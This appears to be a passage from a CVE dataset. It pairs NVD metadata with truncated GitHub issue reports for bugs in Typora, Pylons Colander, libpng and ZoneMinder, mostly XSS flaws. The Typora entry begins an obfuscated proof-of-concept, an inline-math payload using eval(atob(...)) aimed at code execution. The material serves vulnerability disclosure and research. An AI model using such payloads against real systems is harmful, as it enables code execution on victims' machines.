{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2131" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Th...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:*:*:*:*:*:*:*:*", "matchCriteriaId": "D852391E-C916-458B-9BE1-EC6983BF56F4", "versionEndExcluding": null, "versionEndIncluding": "0.9.64", "versionStartExcludin...
[ "79" ]
79
https://github.com/typora/typora-issues/issues/2131
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
The new version (**v0.9.64**), only fixed the vulnerability when rendering mathematical formula in block. However it also has this problem when **rendering inline** ,so the new poc: ```markdown $</script><iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd...
The XSS with resultant RCE vulnerability when rendering Mathematical formula inline.
https://api.github.com/repos/typora/typora-issues/issues/2131/comments
2
2019-01-26T09:10:47Z
2019-03-20T20:09:54Z
https://github.com/typora/typora-issues/issues/2131
403,423,061
2,131
92
CVE-2017-18361
2019-02-01T09:29:00.233
In Pylons Colander through 1.6, the URL validator allows an attacker to potentially cause an infinite loop thereby causing a denial of service via an unclosed parenthesis.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Pylons/colander/issues/290" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pylonsproject:colander:*:*:*:*:*:*:*:*", "matchCriteriaId": "10A6769F-FEF6-4B61-9A5D-731A871D2094", "versionEndExcluding": null, "versionEndIncluding": "1.6", "versionStartEx...
[ "835" ]
835
https://github.com/Pylons/colander/issues/290
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Pylons", "colander" ]
When there is an unclosed parenthesis in URL and we use _url_ validator, it causes an infinite loop. What's more interesting is that it only happens when the unclosed parenthesis is followed by many characters (check test case number 3 and 4). ``` from colander import MappingSchema, SchemaNode, Str, url class My...
Unclosed parenthesis in URL causes infinite loop
https://api.github.com/repos/Pylons/colander/issues/290/comments
1
2017-04-26T09:11:05Z
2019-02-01T18:04:33Z
https://github.com/Pylons/colander/issues/290
224,397,208
290
93
CVE-2019-7317
2019-02-04T08:29:00.447
png_image_free in png.c in libpng 1.6.x before 1.6.37 has a use-after-free because png_image_free_function is called under png_safe_execute.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00002.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "matchCriteriaId": "078AA00A-515F-493E-A53E-FE1937FA8018", "versionEndExcluding": "1.6.37", "versionEndIncluding": null, "versionStartExcludin...
[ "416" ]
416
https://github.com/glennrp/libpng/issues/275
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "glennrp", "libpng" ]
We ran some tests on an older version of libpng and found a use-after-free bug while running one the test cases. It looks like the bug is still there in the latest code. Here's the output from our tool DTS_MSG: Stensal DTS detected a fatal program error! DTS_MSG: Continuing the execution will cause unexpected behav...
Use after free
https://api.github.com/repos/pnggroup/libpng/issues/275/comments
19
2019-01-26T00:53:09Z
2019-04-15T04:54:40Z
https://github.com/pnggroup/libpng/issues/275
403,385,849
275
94
CVE-2019-7325
2019-02-04T19:29:00.383
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as multiple views under web/skins/classic/views insecurely utilize $_REQUEST['PHP_SELF'], without applying any proper filtration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2450" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2450
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** There exists XSS in multiple views as it insecurely utilizes `$_REQUEST['PHP_SELF']`, that is without applying any proper filtration All the view files available under /web/skins/classic/...
Reflected Site Scripting(XSS) - Multiple ($_SERVER['PHP_SELF']) (1)
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2450/comments
0
2019-01-24T19:31:01Z
2019-02-10T06:12:59Z
https://github.com/ZoneMinder/zoneminder/issues/2450
402,861,864
2,450
95
CVE-2019-7326
2019-02-04T19:29:00.430
Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'Host' parameter value in the view console (console.php) because proper filtration is omitted. This relates to the index.php?view=monitor Host Name field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2452" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2452
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `console`, insecurely prints the `Host` value on the webpage, without applying any proper filtration, leading to Self - stored XSS. **To Reproduce** Affected URL : http://l...
Self - Stored Cross Site Scripting (XSS) - console.php
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2452/comments
0
2019-01-24T19:44:53Z
2019-02-09T10:30:32Z
https://github.com/ZoneMinder/zoneminder/issues/2452
402,866,805
2,452
96
CVE-2019-7327
2019-02-04T19:29:00.477
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) because proper filtration is omitted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2447" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2447
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `frame`, insecurely prints the `scale` parameter value on the webpage without applying any proper filtration, leading to reflected XSS. **To Reproduce** Affected URL : ht...
Reflected Cross Site Scripting(XSS) - frame.php
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2447/comments
0
2019-01-24T19:18:03Z
2019-02-09T23:11:58Z
https://github.com/ZoneMinder/zoneminder/issues/2447
402,856,994
2,447
97
CVE-2019-7328
2019-02-04T19:29:00.523
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'scale' parameter value in the view frame (frame.php) via /js/frame.js.php because proper filtration is omitted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2449" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2449
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `frame`, insecurely prints the `scale` parameter value on the webpage that is without applying any proper filtration, leading to XSS. **To Reproduce** Affected URL : http:/...
Reflected Cross Site Scripting(XSS) - frame.php (3)
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2449/comments
0
2019-01-24T19:26:47Z
2019-02-09T23:11:58Z
https://github.com/ZoneMinder/zoneminder/issues/2449
402,860,291
2,449
98
CVE-2019-7329
2019-02-04T19:29:00.570
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, as the form action on multiple views utilizes $_SERVER['PHP_SELF'] insecurely, mishandling any arbitrary input appended to the webroot URL, without any proper filtration, leading to XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2446" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2446
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The form action on the multiple views utilizes `$_SERVER['PHP_SELF'];` insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration would lead to an reflected X...
Reflected Cross Site Scripting (XSS) - Multiple ($_SERVER['PHP_SELF'])
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2446/comments
0
2019-01-24T19:14:11Z
2019-02-10T06:12:59Z
https://github.com/ZoneMinder/zoneminder/issues/2446
402,855,606
2,446
99
CVE-2019-7330
2019-02-04T19:29:00.600
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'show' parameter value in the view frame (frame.php) because proper filtration is omitted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2448" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2448
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `frame`, insecurely prints the `show` parameter value on the webpage without applying any proper filtration, leading to reflected XSS. **To Reproduce** Affected URL : http:...
Reflected Cross Site Scripting(XSS) - frame.php (2)
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2448/comments
0
2019-01-24T19:22:37Z
2019-02-09T23:11:57Z
https://github.com/ZoneMinder/zoneminder/issues/2448
402,858,733
2,448
100
CVE-2019-7331
2019-02-04T19:29:00.647
Self - Stored Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3 while editing an existing monitor field named "signal check color" (monitor.php). There exists no input validation or output filtration, leaving it vulnerable to HTML Injection and an XSS attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2451" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2451
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** A user can edit an existing monitor thereby modifying various misc properties, one of them being `signal check color`. There exists no input validation & output filtration, leaving it vulner...
Self - Stored Cross Site Scripting (XSS) - monitor.php
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2451/comments
0
2019-01-24T19:40:22Z
2019-02-10T00:43:25Z
https://github.com/ZoneMinder/zoneminder/issues/2451
402,865,181
2,451
101
CVE-2019-7332
2019-02-04T19:29:00.693
Reflected Cross Site Scripting (XSS) exists in ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code via a vulnerable 'eid' (aka Event ID) parameter value in the view download (download.php) because proper filtration is omitted.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8045339C-B032-47D7-BEAE-90BCC6699C06", "versionEndExcluding": null, "versionEndIncluding": "1.32.3", "versionStart...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2442
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** - ZoneMinder v1.33.1 - Installed from - ppa:iconnor/zoneminder-master **Describe the bug** The view `download`, while exporting an event file, prints the `eid` (Event ID) on the webpage without applying any proper filtration, leading to an XSS issue. **To Reproduce** Affec...
Reflected Cross Site Scripting (XSS) - download.php (2)
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2442/comments
0
2019-01-24T17:17:24Z
2019-02-09T09:37:57Z
https://github.com/ZoneMinder/zoneminder/issues/2442
402,812,072
2,442
102